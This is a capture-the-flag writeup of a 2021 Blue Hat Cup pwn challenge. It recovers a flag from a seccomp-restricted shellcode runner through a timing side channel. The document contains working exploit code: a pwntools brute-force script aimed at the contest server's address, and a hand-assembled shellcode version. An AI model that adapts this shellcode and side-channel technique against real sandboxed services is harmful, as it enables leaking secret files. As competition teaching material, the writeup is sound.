2021蓝帽杯 PWN writeup

This year's 蓝帽杯 (Blue Hat Cup) was scheduled at an absolutely cursed time: Thursday, when I have classes all day, so what the hell was I supposed to play with.

I spent a bit of time at noon working on the challenges with my teammates, and unexpectedly one of the pwn challenges turned out to be the exact problem from last year's on-site final, which explains why so many people solved it:

So I went and studied last year's writeup by the strong players (consider this a reproduction).

The challenge mmaps an executable region at 0x10000, reads shellcode into it and jumps to it. Before executing, it installs a seccomp filter that forbids every system call except open and read (the exploit below only ever uses syscall numbers 2 and 0), so there is no write available to send the flag back directly. Instead the flag is brute-forced one byte at a time through a timing side channel: the shellcode opens and reads ./flag, compares one byte of it against a guess, spins in a tight loop if the byte matches and returns into garbage (crashing the process immediately) if it does not. A connection that stays alive until the recv timeout therefore means the guess was right.

exp:

from pwn import *
import time

file = context.binary = './chall'
HOST, PORT = '8.140.177.7', 40334

def pwn(p, index, ch):
    # rdi = 0x10032aaa >> 12 = 0x10032, the address of "./flag" inside the
    # shellcode buffer (the shifted immediate keeps NUL bytes out of the code);
    # rsi = 0 (O_RDONLY); open("./flag", O_RDONLY) via syscall 2
    shellcode = "push 0x10032aaa; pop rdi; shr edi, 12; xor esi, esi; push 2; pop rax; syscall;"

    # re open, rax => 4
    shellcode += "push 2; pop rax; syscall;"

    # read(rax, 0x10040, 0x50): the flag lands at 0x10040 and rsi keeps pointing at it
    shellcode += "mov rdi, rax; xor eax, eax; push 0x50; pop rdx; push 0x10040aaa; pop rsi; shr esi, 12; syscall;"

    # cmp byte ptr [rsi+index], ch; jz back to the cmp (spin forever on a match);
    # ret into garbage (immediate crash) on a mismatch. The jz target is relative
    # to the jz itself: `cmp byte ptr [rsi], imm8` encodes in 3 bytes, while
    # `cmp byte ptr [rsi+disp8], imm8` needs 4.
    if index == 0:
        shellcode += "cmp byte ptr[rsi+{0}], {1}; jz $-3; ret".format(index, ch)
    else:
        shellcode += "cmp byte ptr[rsi+{0}], {1}; jz $-4; ret".format(index, ch)

    shellcode = asm(shellcode)
    # print(len(shellcode))
    # pad to 0x40-14 = 0x32 so that "./flag" ends up at 0x10000 + 0x32 = 0x10032
    p.sendafter("Welcome to silent execution-box.\n", shellcode.ljust(0x40-14, b'a') + b'./flag')

index = 0
a = []
# flag{
while True:
    for ch in range(0x20 + 0, 127):          # printable ASCII only
        p = None
        for _ in range(10):                   # retry the connection a few times
            try:
                #print("try... %d" % ch)
                p = remote(HOST, PORT)
                break
            except Exception:
                sleep(3)
                continue
        if p is None:                         # never got a connection: retry this guess
            continue

        #p=process(file)
        try:
            pwn(p, index, ch)
        except Exception:
            p.close()
            continue
        # time how long the remote stays alive: a matching byte spins in the
        # jz loop until recv() times out, a mismatch dies right away
        start = time.time()
        try:
            p.recv(timeout=2)
        except Exception:
            pass
        end = time.time()
        p.close()
        if end-start > 1.5:
            a.append(ch)
            print("found: " + "".join([chr(i) for i in a]))
            break
    else:
        # no printable byte matched at this index: we ran off the end of the flag
        print("found: " + "".join([chr(i) for i in a]))
        break
    index = index + 1

print("flag: " + "".join([chr(i) for i in a]))
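The probe and the timing loop can also be built without pwntools, which makes the encoding behind `jz $-3` / `jz $-4` explicit and lets the brute-force driver be checked offline against a fake oracle. The block below is an added example written for this page, not the original exploit: it hand-assembles the same x86-64 shellcode (open twice, read, cmp/jz/ret), generalises the displacement to disp32 and larger read sizes (neither is needed for this challenge), and drives the byte-by-byte recovery through a pluggable `probe` callback. The 0x10000 buffer, `./flag` at 0x10032, the flag read to 0x10040, the banner string and the 1.5 s threshold come from the writeup; the trailing NUL after `./flag`, the `connect` callback returning a pwntools-style tube, `time.monotonic` and the constructed offline oracle are assumptions.

```python
import struct
import time

# Layout taken from the writeup: RWX page at 0x10000, "./flag" at offset 0x32
# (0x40-14) inside the shellcode buffer, flag bytes read to 0x10040.
SHELLCODE_BASE = 0x10000
PATH_OFF = 0x32
FLAG_BUF = 0x10040
BANNER = b"Welcome to silent execution-box.\n"


def _push(v):
    """push imm8 when it fits (sign-extended), otherwise push imm32."""
    return b"\x6a" + bytes([v]) if v < 0x80 else b"\x68" + struct.pack("<I", v)


def build_probe(index, ch, read_len=0x50):
    """Hand-assembled x86-64 probe equivalent to the writeup's shellcode:
    open("./flag", O_RDONLY) twice, read(fd, 0x10040, read_len), then
    `cmp byte ptr [rsi+index], ch; jz <cmp>; ret`.  A match spins forever,
    a mismatch returns into garbage and the process dies at once."""
    assert 0 <= ch < 256 and 0 <= index < read_len
    sc = _push(0x10032aaa) + b"\x5f" + b"\xc1\xef\x0c"      # pop rdi; shr edi,12 -> 0x10032
    sc += b"\x31\xf6"                                        # xor esi, esi   (O_RDONLY)
    sc += b"\x6a\x02\x58\x0f\x05"                            # push 2; pop rax; syscall (open)
    sc += b"\x6a\x02\x58\x0f\x05"                            # open again, as the writeup does
    sc += b"\x48\x89\xc7"                                    # mov rdi, rax   (fd)
    sc += b"\x31\xc0"                                        # xor eax, eax   (read)
    sc += _push(read_len) + b"\x5a"                          # pop rdx        (count)
    sc += _push(0x10040aaa) + b"\x5e" + b"\xc1\xee\x0c"      # pop rsi; shr esi,12 -> 0x10040
    sc += b"\x0f\x05"                                        # syscall        (read)
    # cmp byte ptr [rsi+index], imm8 -- shortest displacement encoding
    if index == 0:
        cmp = b"\x80\x3e" + bytes([ch])                                # 3 bytes, no disp
    elif index < 0x80:
        cmp = b"\x80\x7e" + bytes([index, ch])                         # 4 bytes, disp8
    else:
        cmp = b"\x80\xbe" + struct.pack("<i", index) + bytes([ch])     # 7 bytes, disp32
    sc += cmp
    # jz rel8 is 2 bytes and rel8 counts from the end of the jz, so jumping
    # back to the cmp is -(len(cmp) + 2): the writeup's `jz $-3` / `jz $-4`.
    sc += b"\x74" + bytes([(-(len(cmp) + 2)) & 0xFF])
    sc += b"\xc3"                                            # ret
    return sc


def build_payload(index, ch, read_len=0x50):
    """Probe padded so the path lands at SHELLCODE_BASE + PATH_OFF.  The trailing
    NUL is an assumption; the writeup relies on the fresh page being zero-filled."""
    sc = build_probe(index, ch, read_len)
    assert len(sc) <= PATH_OFF, "probe overlaps the path string"
    return sc.ljust(PATH_OFF, b"a") + b"./flag\x00"


def timed_probe(connect, index, ch, timeout=2.0):
    """Send one probe through a pwntools-style tube returned by connect() and
    report how long the remote stayed alive.  A correct guess keeps the
    connection open until recv() times out; a wrong one drops it at once."""
    p = connect()
    try:
        p.sendafter(BANNER, build_payload(index, ch))
        start = time.monotonic()
        try:
            p.recv(timeout=timeout)
        except EOFError:
            pass
        return time.monotonic() - start
    finally:
        p.close()


def recover_flag(probe, charset=range(0x20, 0x7F), threshold=1.5, max_len=0x50):
    """probe(index, ch) -> seconds alive.  Stops at the first index where no
    printable byte matches (the NUL or newline after the flag)."""
    flag = bytearray()
    for index in range(max_len):
        for ch in charset:
            if probe(index, ch) > threshold:
                flag.append(ch)
                break
        else:
            break
    return bytes(flag)


def make_fake_probe(secret, alive=2.0, dead=0.02):
    """Constructed offline oracle with the same timing signature as the remote."""
    def probe(index, ch):
        byte = secret[index] if index < len(secret) else 0
        return alive if byte == ch else dead
    return probe


if __name__ == "__main__":
    # offline: run the driver against a constructed secret
    print(recover_flag(make_fake_probe(b"flag{timing_side_channel}")))
    # live (needs pwntools): from pwn import remote
    # print(recover_flag(lambda i, c: timed_probe(lambda: remote("8.140.177.7", 40334), i, c)))
```

Note that with the writeup's layout the disp32 form no longer fits in the 0x32 bytes before the path string, which `build_payload` catches with its assertion; it is there to show the general encoding, not because this flag needs it.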